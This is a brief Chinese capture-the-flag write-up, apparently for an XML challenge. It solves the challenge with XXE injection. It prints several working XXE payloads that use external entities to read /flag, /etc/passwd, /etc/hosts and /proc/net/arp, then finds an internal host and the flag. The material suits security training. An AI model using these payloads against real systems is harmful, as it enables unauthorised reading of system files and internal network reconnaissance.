之前写了个fake
这次又来个ture
打开环境
明确是xxe
直接抓包
回显位还是1
试试直接读flag
<?xml version="1.0" ?>
<!DOCTYPE note [
<!ENTITY M1kael SYSTEM "file:///flag">
]>
<user>
<username>&M1kael;</username>
<password>123456</password>
</user>
报错,预料之中,没这么简单
/etc/hosts 储存域名解析的缓存
/etc/passwd 用户密码
/proc/net/arp 每个网络接口的arp表中dev包
先查看/etc/passwd
<?xml version="1.0" ?>
<!DOCTYPE note [
<!ENTITY M1kael SYSTEM "file:///etc/passwd">
]>
<user>
<username>&M1kael;</username>
<password>123456</password>
</user>
没什么发现
再看看/etc/hosts
<?xml version="1.0" ?>
<!DOCTYPE note [
<!ENTITY M1kael SYSTEM "file:///etc/hosts">
]>
<user>
<username>&M1kael;</username>
<password>123456</password>
</user>
也没内网主机ip
再试试/proc/net/arp
<?xml version="1.0" ?>
<!DOCTYPE note [
<!ENTITY M1kael SYSTEM "file:///proc/net/arp">
]>
<user>
<username>&M1kael;</username>
<password>123456</password>
</user>
发现内网主机ip
得到flag
希望这篇文章能够帮助你!